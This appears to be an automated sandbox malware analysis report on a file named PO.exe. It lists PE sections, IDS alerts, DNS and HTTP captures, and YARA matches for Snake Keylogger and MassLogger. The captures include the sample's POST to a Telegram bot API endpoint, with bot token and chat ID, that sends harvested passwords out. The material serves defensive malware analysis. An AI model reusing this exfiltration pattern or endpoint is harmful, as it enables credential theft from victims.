                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x20000x317240x31800f0353ac71ed335ea0c5eef80774b5128False0.6826122553661617data7.755314263801649IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .rsrc0x340000x5860x6004713da45945b2a2056b5d5a9c5d1b92aFalse0.412109375data4.008929408222653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .reloc0x360000xc0x2006f6bb9996e1bcbc53f04faf30c5d7cb1False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          RT_VERSION0x340a00x2fcdata0.43324607329842935
                                                                                                                                          RT_MANIFEST0x3439c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                          DLLImport
                                                                                                                                          mscoree.dll_CorExeMain
                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                          2025-01-08T21:10:59.985867+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449732193.122.6.16880TCP
                                                                                                                                          2025-01-08T21:11:07.063997+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449732193.122.6.16880TCP
                                                                                                                                          2025-01-08T21:11:07.715577+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449737149.154.167.220443TCP
                                                                                                                                          2025-01-08T21:11:08.116847+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449737149.154.167.220443TCP
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 8, 2025 21:10:58.764142036 CET4973280192.168.2.4193.122.6.168
                                                                                                                                          Jan 8, 2025 21:10:58.769026995 CET8049732193.122.6.168192.168.2.4
                                                                                                                                          Jan 8, 2025 21:10:58.769134045 CET4973280192.168.2.4193.122.6.168
                                                                                                                                          Jan 8, 2025 21:10:58.772310972 CET4973280192.168.2.4193.122.6.168
                                                                                                                                          Jan 8, 2025 21:10:58.777051926 CET8049732193.122.6.168192.168.2.4
                                                                                                                                          Jan 8, 2025 21:10:59.743350983 CET8049732193.122.6.168192.168.2.4
                                                                                                                                          Jan 8, 2025 21:10:59.748275995 CET4973280192.168.2.4193.122.6.168
                                                                                                                                          Jan 8, 2025 21:10:59.753103971 CET8049732193.122.6.168192.168.2.4
                                                                                                                                          Jan 8, 2025 21:10:59.945437908 CET8049732193.122.6.168192.168.2.4
                                                                                                                                          Jan 8, 2025 21:10:59.955194950 CET49734443192.168.2.4104.21.112.1
                                                                                                                                          Jan 8, 2025 21:10:59.955240965 CET44349734104.21.112.1192.168.2.4
                                                                                                                                          Jan 8, 2025 21:10:59.955307961 CET49734443192.168.2.4104.21.112.1
                                                                                                                                          Jan 8, 2025 21:10:59.965594053 CET49734443192.168.2.4104.21.112.1
                                                                                                                                          Jan 8, 2025 21:10:59.965614080 CET44349734104.21.112.1192.168.2.4
                                                                                                                                          Jan 8, 2025 21:10:59.985867023 CET4973280192.168.2.4193.122.6.168
                                                                                                                                          Jan 8, 2025 21:11:00.445003986 CET44349734104.21.112.1192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:00.445125103 CET49734443192.168.2.4104.21.112.1
                                                                                                                                          Jan 8, 2025 21:11:00.451329947 CET49734443192.168.2.4104.21.112.1
                                                                                                                                          Jan 8, 2025 21:11:00.451344967 CET44349734104.21.112.1192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:00.451659918 CET44349734104.21.112.1192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:00.501511097 CET49734443192.168.2.4104.21.112.1
                                                                                                                                          Jan 8, 2025 21:11:00.502280951 CET49734443192.168.2.4104.21.112.1
                                                                                                                                          Jan 8, 2025 21:11:00.543334007 CET44349734104.21.112.1192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:00.659204960 CET44349734104.21.112.1192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:00.659262896 CET44349734104.21.112.1192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:00.659390926 CET49734443192.168.2.4104.21.112.1
                                                                                                                                          Jan 8, 2025 21:11:00.666004896 CET49734443192.168.2.4104.21.112.1
                                                                                                                                          Jan 8, 2025 21:11:05.810842037 CET4973280192.168.2.4193.122.6.168
                                                                                                                                          Jan 8, 2025 21:11:05.816257000 CET8049732193.122.6.168192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:07.020675898 CET8049732193.122.6.168192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:07.034341097 CET49737443192.168.2.4149.154.167.220
                                                                                                                                          Jan 8, 2025 21:11:07.034384966 CET44349737149.154.167.220192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:07.034472942 CET49737443192.168.2.4149.154.167.220
                                                                                                                                          Jan 8, 2025 21:11:07.034992933 CET49737443192.168.2.4149.154.167.220
                                                                                                                                          Jan 8, 2025 21:11:07.035007954 CET44349737149.154.167.220192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:07.063997030 CET4973280192.168.2.4193.122.6.168
                                                                                                                                          Jan 8, 2025 21:11:07.669204950 CET44349737149.154.167.220192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:07.669285059 CET49737443192.168.2.4149.154.167.220
                                                                                                                                          Jan 8, 2025 21:11:07.671221018 CET49737443192.168.2.4149.154.167.220
                                                                                                                                          Jan 8, 2025 21:11:07.671231031 CET44349737149.154.167.220192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:07.671453953 CET44349737149.154.167.220192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:07.672888994 CET49737443192.168.2.4149.154.167.220
                                                                                                                                          Jan 8, 2025 21:11:07.715333939 CET44349737149.154.167.220192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:07.715457916 CET49737443192.168.2.4149.154.167.220
                                                                                                                                          Jan 8, 2025 21:11:07.715466022 CET44349737149.154.167.220192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:08.116914988 CET44349737149.154.167.220192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:08.117010117 CET44349737149.154.167.220192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:08.117101908 CET49737443192.168.2.4149.154.167.220
                                                                                                                                          Jan 8, 2025 21:11:08.117621899 CET49737443192.168.2.4149.154.167.220
                                                                                                                                          Jan 8, 2025 21:12:12.020170927 CET8049732193.122.6.168192.168.2.4
                                                                                                                                          Jan 8, 2025 21:12:12.020255089 CET4973280192.168.2.4193.122.6.168
                                                                                                                                          Jan 8, 2025 21:12:40.674154043 CET4973280192.168.2.4193.122.6.168
                                                                                                                                          Jan 8, 2025 21:12:40.679025888 CET8049732193.122.6.168192.168.2.4
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 8, 2025 21:10:58.666024923 CET5990953192.168.2.41.1.1.1
                                                                                                                                          Jan 8, 2025 21:10:58.672779083 CET53599091.1.1.1192.168.2.4
                                                                                                                                          Jan 8, 2025 21:10:59.947437048 CET6185053192.168.2.41.1.1.1
                                                                                                                                          Jan 8, 2025 21:10:59.954431057 CET53618501.1.1.1192.168.2.4
                                                                                                                                          Jan 8, 2025 21:11:07.026004076 CET4986553192.168.2.41.1.1.1
                                                                                                                                          Jan 8, 2025 21:11:07.033505917 CET53498651.1.1.1192.168.2.4
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Jan 8, 2025 21:10:58.666024923 CET192.168.2.41.1.1.10x45cbStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:59.947437048 CET192.168.2.41.1.1.10x16f4Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:11:07.026004076 CET192.168.2.41.1.1.10xd460Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Jan 8, 2025 21:10:58.672779083 CET1.1.1.1192.168.2.40x45cbNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:58.672779083 CET1.1.1.1192.168.2.40x45cbNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:58.672779083 CET1.1.1.1192.168.2.40x45cbNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:58.672779083 CET1.1.1.1192.168.2.40x45cbNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:58.672779083 CET1.1.1.1192.168.2.40x45cbNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:58.672779083 CET1.1.1.1192.168.2.40x45cbNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:59.954431057 CET1.1.1.1192.168.2.40x16f4No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:59.954431057 CET1.1.1.1192.168.2.40x16f4No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:59.954431057 CET1.1.1.1192.168.2.40x16f4No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:59.954431057 CET1.1.1.1192.168.2.40x16f4No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:59.954431057 CET1.1.1.1192.168.2.40x16f4No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:59.954431057 CET1.1.1.1192.168.2.40x16f4No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:10:59.954431057 CET1.1.1.1192.168.2.40x16f4No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 21:11:07.033505917 CET1.1.1.1192.168.2.40xd460No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                          • reallyfreegeoip.org
                                                                                                                                          • api.telegram.org
                                                                                                                                          • checkip.dyndns.org
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.449732193.122.6.168807740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 8, 2025 21:10:58.772310972 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 8, 2025 21:10:59.743350983 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 20:10:59 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 8, 2025 21:10:59.748275995 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 8, 2025 21:10:59.945437908 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 20:10:59 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 8, 2025 21:11:05.810842037 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 8, 2025 21:11:07.020675898 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 20:11:06 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.449734104.21.112.14437740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 20:11:00 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-08 20:11:00 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 20:11:00 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1681849
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F0XEPn1MbuzDl%2BR1%2FqHIHjVpkyddsuMUmkcRp%2F2KV4vtMiiyq2MnoyiOJtP79rYNJwkng1xlztykUgmVKw7gTLyj4IthYy8yhoYc1fzt8t7GfcnQJpU0XlrvtfRVeHS%2FeC%2FvkcHh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8feed5907d5743b3-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1599&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1826141&cwnd=203&unsent_bytes=0&cid=fdf3f28886218dc8&ts=228&x=0"
                                                                                                                                          2025-01-08 20:11:00 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.449737149.154.167.2204437740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 20:11:07 UTC295OUTPOST /bot7825959937:AAEuKj4hp2JK5DXFcnVH39_e6ViQFWstbqY/sendDocument?chat_id=6023628633&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                          Content-Type: multipart/form-data; boundary================8dd2ff6ac886487
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Content-Length: 1088
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-08 20:11:07 UTC1088OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 66 66 36 61 63 38 38 36 34 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                          Data Ascii: --===============8dd2ff6ac886487Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                          2025-01-08 20:11:08 UTC388INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Wed, 08 Jan 2025 20:11:08 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 560
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                          2025-01-08 20:11:08 UTC560INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 32 35 39 35 39 39 33 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 32 30 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 68 69 73 6f 6d 5f 6f 6b 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 33 36 32 38 36 33 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 6f 6f 64 20 6c 69 66 65 20 69 6e 76 65 73 74 6d 65 6e 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 6f 6f 64 5f 6c 69 66 65 5f 69 6e 76 65 73 74 6d 65 6e 74 5f 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 33 36 37 30
                                                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":66,"from":{"id":7825959937,"is_bot":true,"first_name":"NOVA2025","username":"chisom_okbot"},"chat":{"id":6023628633,"first_name":"Good life investment","username":"Good_life_investment_1","type":"private"},"date":17363670


                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Click to jump to process

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:15:10:55
                                                                                                                                          Start date:08/01/2025
                                                                                                                                          Path:C:\Users\user\Desktop\PO.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\PO.exe"
                                                                                                                                          Imagebase:0x1b0000
                                                                                                                                          File size:205'312 bytes
                                                                                                                                          MD5 hash:317FE502DA9A45F02EB78096E44FF70D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:15:10:56
                                                                                                                                          Start date:08/01/2025
                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                          Imagebase:0x550000
                                                                                                                                          File size:65'440 bytes
                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:10.1%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:2.3%
                                                                                                                                            Total number of Nodes:132
                                                                                                                                            Total number of Limit Nodes:10
                                                                                                                                            execution_graph 15469 6fb0ca8 15470 6fb0cc0 15469->15470 15471 6fb0cd9 15470->15471 15474 6fb0fc9 15470->15474 15479 6fb0fd8 15470->15479 15475 6fb0fd8 15474->15475 15476 6fb0ff3 15475->15476 15484 6fb1428 OleInitialize 15475->15484 15486 6fb1430 OleInitialize 15475->15486 15476->15471 15480 6fb0fe3 15479->15480 15481 6fb0ff3 15480->15481 15482 6fb1428 OleInitialize 15480->15482 15483 6fb1430 OleInitialize 15480->15483 15481->15471 15482->15481 15483->15481 15485 6fb1494 15484->15485 15485->15476 15487 6fb1494 15486->15487 15487->15476 15461 234b1b0 15464 234b298 15461->15464 15462 234b1bf 15465 234b2b9 15464->15465 15466 234b2dc 15464->15466 15465->15466 15467 234b4e0 GetModuleHandleW 15465->15467 15466->15462 15468 234b50d 15467->15468 15468->15462 15488 234d540 15489 234d586 GetCurrentProcess 15488->15489 15491 234d5d1 15489->15491 15492 234d5d8 GetCurrentThread 15489->15492 15491->15492 15493 234d615 GetCurrentProcess 15492->15493 15494 234d60e 15492->15494 15495 234d64b 15493->15495 15494->15493 15496 234d673 GetCurrentThreadId 15495->15496 15497 234d6a4 15496->15497 15498 2346fa0 15499 2346fb7 15498->15499 15504 23472be 15499->15504 15508 234730a 15499->15508 15515 234713f 15499->15515 15500 2346fd4 15505 2347271 15504->15505 15505->15504 15519 2345cec 15505->15519 15507 23472f8 15507->15500 15509 2347313 15508->15509 15510 2347271 15508->15510 15511 2345d0c 2 API calls 15509->15511 15512 2345cec 2 API calls 15510->15512 15514 234739d 15511->15514 15513 23472f8 15512->15513 15513->15500 15514->15500 15516 2347177 15515->15516 15517 2345cec 2 API calls 15516->15517 15518 23472f8 15517->15518 15518->15500 15520 2345cf7 15519->15520 15523 2345d0c 15520->15523 15522 234739d 15522->15507 15524 2345d17 15523->15524 15527 2345d3c 15524->15527 15526 234747a 15526->15522 15528 2345d47 15527->15528 15531 2345d6c 15528->15531 15530 234756d 15530->15526 15533 2345d77 15531->15533 15532 2348b09 15532->15530 15533->15532 15535 234ce60 15533->15535 15536 234ce91 15535->15536 15537 234ceb5 15536->15537 15540 234d428 15536->15540 15544 234d418 